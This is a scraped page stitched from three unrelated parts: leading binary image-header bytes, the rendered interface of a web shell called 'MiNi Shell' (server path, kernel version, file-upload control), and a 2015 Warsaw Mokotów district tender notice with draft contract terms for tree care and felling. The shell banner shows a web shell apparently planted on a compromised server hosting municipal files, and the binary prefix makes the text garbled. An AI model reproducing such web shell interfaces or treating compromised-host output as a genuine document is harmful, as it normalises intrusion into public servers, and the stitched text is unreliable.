JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150902/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150902/227382-N-2015.html

<p class="kh_header"><b>Warszawa: Wykonanie pielęgnacji i wycinki drzewostanu rosnącego na terenach zieleni miejskiej Dzielnicy Mokotów</b><br>
<b>Numer ogłoszenia: 227382 - 2015; data zamieszczenia: 02.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa Dzielnica Mokotów , ul. Rakowiecka 25/27, 02-517 Warszawa, woj. mazowieckie, tel. 022 5651562, faks 022 5651562.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mokotow.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie pielęgnacji i wycinki drzewostanu rosnącego na terenach zieleni miejskiej Dzielnicy Mokotów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pielęgnacja drzew, wycinka drzew z frezowaniem, wywóz połamanych konarów i wiatrołomów.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.21.14.00-6, 77.21.15.00-7.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie wykonania w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej usługi polegającej na utrzymaniu drzewostanu o wartości min 90.000 zł. brutto

Zamawiający uzna za usługę polegającą na utrzymaniu drzewostanu usługę pielęgnacji lub wycinki drzewostanu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie do kierowania prac konserwatorskich lub restauratorskich, posiadającego tytuł zawodowy magistra uzyskany po ukończeniu wyższych studiów, obejmujących wiadomości w zakresie zabezpieczenia, uzupełnienia, rekonstrukcji lub konserwacji parków zabytkowych albo innego rodzaju zorganizowanej zieleni zabytkowej oraz który odbył, co najmniej 12 miesięczną praktykę zawodową przy konserwacji i pielęgnacji parków zabytkowych albo innego rodzaju zorganizowanej zieleni zabytkowej, zgodnie z wymogami Rozporządzenia Ministra Kultury z dnia 9 czerwca 2004 r. par. 8 ust. 3 /Dz. U. z 30.06.2004 r. Nr 150, poz. 1579/</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Należy wykazać co najmniej jedną usługę polegającą na utrzymaniu drzewostanu o wartości nie mniejszej niż 90.000,00 zł. brutto oraz załączyć dowody potwierdzające, że została wykonana należycie.
Zamawiający nie wymaga wykazania usług niewykonanych lub wykonanych nienależycie.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pisemne zobowiązanie podmiotów oddających do dyspozycji wykonawcy niezbędnych zasobów na potrzeby wykonania zamówienia  -  w formie oryginałów w przypadku, gdy wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków w szczególności, /wzór druku załącznik nr 5 do wniosku o dopuszczenie do udziału w licytacji elektronicznej/.
Zamawiający wymaga aby składany dokument w szczególności zawierał informacje:
-jaki rodzaj zasobu jest udostępniany,
-w jakiej formie podmiot udostępniający zasób będzie uczestniczył w realizacji zamówienia,
-w jakim okresie podmiot udostępniający zasób będzie uczestniczył w realizacji zamówienia,
-jaki stosunek łączy wykonawcę z podmiotem udostępniającym zasób.
Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b ustawy Pzp, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.

Pełnomocnictwo do reprezentowania w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, w przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia.
Pełnomocnictwo określające jego zakres i podpisane przez osoby uprawnione do reprezentacji Wykonawcy, w przypadku, gdy Wykonawcę reprezentuje pełnomocnik.
-Pełnomocnictwo należy przedłożyć w oryginale lub notarialnie potwierdzonej kopii.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>

<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.4.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> http://aukcje.um.warszawa.pl</p>
<p><b>IV.4.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> www.mokotow.waw.pl</p>
<p><b>IV.4.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> 1. Wykonawca ma prawo złożyć tylko jeden wniosek o dopuszczenie do udziału w licytacji elektronicznej. Złożenie większej liczby wniosków, spowoduje odrzucenie wszystkich wniosków złożonych przez danego Wykonawcę.
2. Wniosek oraz wszelkie dokumenty wymagane muszą spełniać następujące wymogi:
a. wniosek musi zostać sporządzony w języku polskim z zachowaniem formy pisemnej na maszynie do pisania, komputerze, ręcznie długopisem czytelnym pismem.
b. formularz wniosku i wszystkie załączane dokumenty sporządzone przez Wykonawcę muszą być podpisane; za podpisanie uznaje się własnoręczny podpis z pieczątką imienną przez osobę upoważnioną do reprezentowania zgodnie z formą reprezentacji Wykonawcy określoną w dokumencie rejestrowym lub innym dokumencie, właściwym dla formy organizacyjnej,
c. w przypadku, gdy Wykonawcę reprezentuje pełnomocnik do wniosku musi być załączone pełnomocnictwo, określające jego zakres i podpisane przez osoby uprawnione do reprezentacji Wykonawcy, pełnomocnictwo musi być złożone w oryginale lub notarialnie poświadczonej kopii
d. pozostałe oświadczenia i dokumenty  muszą być oryginałami lub kserokopiami poświadczonymi na każdej stronie za zgodność z oryginałem przez właściwą osobę, zgodnie z zasadą  oraz muszą być one sporządzone w języku polskim,
e. poprawki lub zmiany ,również przy użyciu korektora, we wniosku, powinny być parafowane własnoręcznie przez osobę podpisującą wniosek,
f. dokumenty składające się na wniosek muszą być sporządzone wg wzorów i wymogów ,
g. dokumenty sporządzone w języku obcym, muszą być składane wraz z ich tłumaczeniem na język polski, poświadczonym przez Wykonawcę
Wzór wniosku o dopuszczenie do udziału w licytacji elektronicznej załącznik nr 1 do treści ogłoszenia dostępny na stronie www.mokotow.waw.pl
Wniosek wraz z załącznikami  należy złożyć w zamkniętej kopercie opatrzonej co najmniej  nazwą przedmiotu zamówienia.
3. Komputer użytkownika powinien spełniać następujące wymagania:
być wyposażony w procesor 733 MHz i posiadać co najmniej 512 MB pamięci RAM
 posiadać zainstalowany system operacyjny MS Windows XP lub nowszy
posiadać zainstalowaną przeglądarkę internetową Microsoft Internet Explorer 6.0. lub nowszą albo Mozilla Firefox 2.x lub nowszą
posiadać połączenie z siecią Internet o szybkości transmisji nie mniejszej niż 128 kb s..</p>
<p><b>IV.4.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> W trakcie licytacji Wykonawca licytuje cenę brutto za całość zamówienia. 
Minimalne postąpienie wynosi 1.000,00 zł brutto.
Cena wywoławcza za całość zamówienia wynosi  102.000,00 zł brutto.

 W toku licytacji elektronicznej Zamawiający na bieżąco przekazuje wszystkim wykonawcom informacje o pozycji składanych przez nich ofert, liczbie wykonawców biorących udział w licytacji, także o cenach złożonych przez nich ofert, z tym, że do momentu zamknięcia licytacji elektronicznej nie ujawnia informacji umożliwiających identyfikację Wykonawców. 
  Cena ofertowa winna obejmować wszystkie koszty i składniki wraz z narzutami, niezbędne do wykonania przedmiotu zamówienia. Zamawiający nie zapewnia zwolnienia Wykonawcy z żadnych podatków, opłat, ani nie będzie zwracał żadnych kar należnych z jakiegokolwiek tytułu, cen transportu, czynności, usług, świadczeń, opłat, ceł, podatków itp.,  Ryzyko konieczności wykonania wszelkich prac towarzyszących, mogących pojawić się w trakcie realizacji zamówienia, ryzyko związane ze zmianami kursów walut, ceł itp., obciąża Wykonawcę i należy uwzględnić je w ofercie.
   Zaproponowana przez Wykonawcę  cena będzie stała w czasie objętym umową. Zapłata nastąpi zgodnie z warunkami umowy. 
Za ofertę najkorzystniejszą zostanie uznana oferta, która zawierać będzie, w chwili zamknięcia licytacji elektronicznej, najniższą cenę brutto realizacji całego zamówienia. Wykonawca, który zaproponował najniższą cenę brutto realizacji przedmiotowego zamówienia, zostaje zwycięzcą licytacji elektronicznej.
  Operator platformy aukcyjnej przekazuje zakwalifikowanym przez Zamawiającego Wykonawcom informację o sposobie rejestracji na platformie aukcyjnej. W trakcie rejestracji Wykonawca otrzyma kod dostępu do platformy aukcyjnej. Otrzymany kod dostępu Wykonawca będzie musiał zmienić na nowy - określony przez siebie. 
Zamawiający podpisze umowę,  z  Wykonawcą, który w chwili zamykania licytacji elektronicznej zaproponował najniższą cenę realizacji przedmiotowego zamówienia. 
Po zamknięciu licytacji elektronicznej, w terminie wyznaczonym przez Zamawiającego, Wykonawca, który został zwycięzcą licytacji elektronicznej ma obowiązek przekazać Zamawiającemu wypełniony formularz cenowy stanowiący załącznik nr 1 do wzoru umowy dostępny na stronie internetowej zamawiającego: www.mokotow.waw.pl
Wszystkie ceny muszą być wyrażone z dokładnością do dwóch miejsc po przecinku w rozumieniu ustawy z dnia 5 lipca 2001 r. o cenach /Dz. U. z 2002r. Nr 97, poz. 1050, ze zm./ oraz ustawy z dnia 7 lipca 1994 r. o denominacji złotego /Dz. U. z 1994 r., Nr 84, poz. 386 ze zm./.
O miejscu i terminie zawarcia umowy Wykonawca zostanie poinformowany przez Zamawiającego po dostarczeniu w/w dokumentu..</p>
<p><b>IV.4.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li><table><tr><td style="font-size: 10pt;"><b>Licytacja jednoetapowa </b>          </td><td></td><td style="font-size: 10pt;"><b>czas trwania:</b> 15 minut</td></tr>
</table></li></ul>

<p><b>IV.4.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 10.09.2015 godzina 10:00, miejsce: siedziba zamawiającego, pok. 35A, wejście E.</p>
<p><b>IV.4.12) Termin otwarcia licytacji elektronicznej:</b> Nie krótszy niż 5 dni od dnia przekazania zaproszeń.</p>
<p><b>IV.4.13) Termin i warunki zamknięcia licytacji elektronicznej </b><i>(jeżeli dotyczy):</i></p>
<p>Zamawiający zamyka licytację gdy w podstawowym czasie nie zostanie złożona żadna oferta lub, gdy w ciągu 3 minut od złożenia oferty przez jednego z wykonawców nie zostanie złożona inna oferta</p>
<p><b>IV.4.14 Wymagania dotyczące zabezpieczenia należytego wykonania umowy </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Nie dotyczy</p>
<p><b>IV.4.15 Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>UMOWA NR MOK-4OŚ/B/III/3/1/B/III/3/2/B/III/3/3//15
Zawarta w dniu /wykropkowanie/ w Warszawie
pomiędzy: Miastem Stołecznym Warszawa Dzielnica Mokotów reprezentowanym na podstawie pełnomocnictwa Prezydenta m. St. Warszawy Nr /wykropkowanie/ z dnia /wykropkowanie/
przez: 	
zwaną dalej ZAMAWIAJĄCYM
a: 
REGON /wykropkowanie/,  NIP /wykropkowanie/
zwaną w dalszej części umowy WYKONAWCĄ, 
który wyłoniony został na podstawie postępowania o udzielenie zamówienia publicznego w trybie licytacji elektronicznej na podstawie art. 74 ustawy Prawo zamówień publicznych 
/Dz. U. z 2013 r. poz. 907 tekst jednolity/, w zakresie objętym zamówieniem o następującej treści:
§ 1
1. Zamawiający zleca, a Wykonawca zobowiązuje się do wykonywania prac w zakresie wykonania pielęgnacji i wycinki drzewostanu rosnącego na terenach  zieleni  miejskiej  Dzielnicy Mokotów, zwanych dalej /pracam/.
2. Zakres prac oraz ich ceny jednostkowe określa  załącznik nr 1 do umowy.
3. Sposób wykonywania prac jest określony w opisie przedmiotu zamówienia, stanowiącym załącznik nr 2 do umowy.
§ 2
1.Termin realizacji prac ustala się od daty zawarcia umowy do dnia  31.10.2015 r.
§ 3
1.	Pracownicy Wykonawcy wykonujący pracę oraz pojazdy Wykonawcy wykorzystywane do realizacji prac winny być zaopatrzone w czytelne logo Wykonawcy umieszczone w widocznym miejscu na pojeździe oraz ubraniach pracowników. 
2.	Wykonawca ponosi odpowiedzialność za wszelkie szkody powstałe w związku  z wykonywaniem prac stanowiących przedmiot umowy. 
3.	Bez zgody Zamawiającego, Wykonawca nie może powierzyć wykonania umowy w całości lub w części osobie  trzeciej.                                                  
§ 4
1.	Za prawidłowe wykonanie prac w okresie obowiązywania umowy Zamawiający zapłaci Wykonawcy wynagrodzenie nie większe niż:
brutto:  /wykropkowanie/zł 
słownie : /wykropkowanie/
wynikające z formularza cenowego ofertowego, stanowiącego załącznik nr 1.
Ceny jednostkowe podane w formularzu cenowym ofertowym nie ulegną zwiększeniu w okresie obowiązywania umowy.
2.Strony umowy ustalają, iż będą dokonywały w okresie obowiązywania umowy rozliczeń finansowych obejmujących poszczególne miesiące kalendarzowe wykonywania prac. Strony 
umowy uzgadniają, że za wykonane prace w każdym miesiącu kalendarzowym Wykonawca 
będzie wystawiał faktury VAT /częściowe/. 
3.Podstawą do wystawienia faktur częściowych za dany miesiąc będą formularze powykonawcze obejmujące rzeczywiste obmiary prac i ceny jednostkowe oraz protokół odbioru wszystkich prac wykonanych w danym miesiącu, podpisany i zaakceptowany przez Zamawiającego.
4.Jeżeli podczas odbioru prac Zamawiający stwierdzi chociażby w części wadliwe wykonanie prac w danym miesiącu , ma prawo odmówić ich odbioru w całości do czasu usunięcia wad, wyznaczając jednocześnie termin technicznie uzasadniony na ich usunięcie.
5.W razie odmowy odbioru prac przez Zamawiającego z przyczyn podanych w ust. 4, prace uważa się za prawidłowo wykonane w terminie, w którym nastąpiło zgłoszenie ich wykonania, po którym bezpośrednio nastąpił ich odbiór przez Zamawiającego bez zastrzeżeń.
6.Do odbioru prac uprzednio nieodebranych jako wadliwych Zamawiający jest obowiązany przystąpić niezwłocznie po doręczeniu zgłoszenia przez Wykonawcę o usunięciu wad. 
Z czynności odbioru prac wadliwych strony umowy sporządzają każdorazowo protokół.
7.Zamawiający zastrzega sobie prawo do zapłaty wynagrodzenia tylko za prace faktycznie wykonane przez Wykonawcę i odebrane przez Zamawiającego bez zastrzeżeń, 
a Wykonawcy nie przysługują w stosunku do Zamawiającego roszczenia o wypłatę wynagrodzenia w kwocie maksymalnej, określonej w  ust.1.
8. Faktury muszą być wystawione w okresie do 7 dni od daty podpisania  protokółu odbioru prac przez Zamawiającego i dostarczone najpóźniej w ciągu 7 dni od daty ich  wystawienia. 
Faktury winny być wystawione na: 
     nabywca: Miasto Stołeczne Warszawa Plac Bankowy 3/5 00-950 Warszawa 
     NIP 525-22-48-481
     odbiorca: Urząd m. st. Warszawa Dzielnica Mokotów 02-517 Warszawa ul.
     Rakowiecka 25/27
     i dostarczona na adres Wydział Ochrony Środowiska dla Dzielnicy Mokotów Warszawa, 
     ul. Wiktorska 91 A
9.Zapłata wynagrodzenia należnego Wykonawcy zostanie dokonana  przelewem na rachunek bankowy Wykonawcy /wykropkowanie/ w terminie 21 dni od daty doręczenia prawidłowo wystawionej faktury VAT. Za termin zapłaty uznaje się dzień obciążenia rachunku Zamawiającego poleceniem zapłaty.
10. Strony zgodnie ustalają, że zmiana rachunku wykonawcy nie wymaga zmiany zapisów niniejszej umowy. Wykonawca zobowiązany jest do powiadomienia Zamawiającego na piśmie o zmianie numeru swojego rachunku.
§ 5
1.Przystąpienie do wykonywania prac przez Wykonawcę  będzie następować na podstawie oświadczeń, zwanego dalej /oświadczeniem/ Zamawiającego, w którym zostanie określony zakres prac, miejsce i termin ich wykonywania. Oświadczenia będą obejmowały miesiące kalendarzowe wykonywania prac i będą przekazywane Wykonawcy osobiście, faksem pod nr  /wykropkowanie/ lub elektronicznie na adres /wykropkowanie/
2.Zamawiający zastrzega sobie prawo polecenia Wykonawcy natychmiastowej realizacji prac w przypadku wystąpienia zagrożenia dla życia, zdrowia ludzkiego lub mienia. W takim przypadku Wykonawca winien zabezpieczyć teren, na którym tego rodzaju prace mają być realizowane, a wykonanie prac winno nastąpić w dniu przekazania polecenia przez Zamawiającego. W poleceniu Zamawiający określi zakres prac, miejsce i termin ich wykonywania.
3.Zamawiający lub Służby Miejskie, sprawować będą bieżącą kontrolę wykonywania prac.
4.Na żądanie Zamawiającego, Wykonawca zobowiązany jest do natychmiastowego skierowania swego przedstawiciela do udziału w kontroli. Niestawienie się Wykonawcy do udziału w czynnościach kontrolnych nie stanowi przeszkody do przeprowadzenia kontroli przez Zamawiającego, a ustalenia dokonane podczas kontroli będą wówczas  wiążące dla Wykonawcy
§ 6
1.	Strony umowy ustalają, iż Wykonawca zapłaci Zamawiającemu kary umowne w następujących przypadkach i wysokościach:
a/ za każdorazową zwłokę w  wykonaniu całości lub części prac wyszczególnionych w oświadczeniu w wysokości 0,2% wartości wynagrodzenia brutto umowy określonego w § 4 ust.1, za każdy rozpoczęty dzień zwłoki, liczonej od dnia, w którym prace miały być wykonane do dnia zgłoszenia wykonania prac, po którym nastąpił ich odbiór przez Zamawiającego  bez zastrzeżeń albo do dnia rozwiązania umowy;
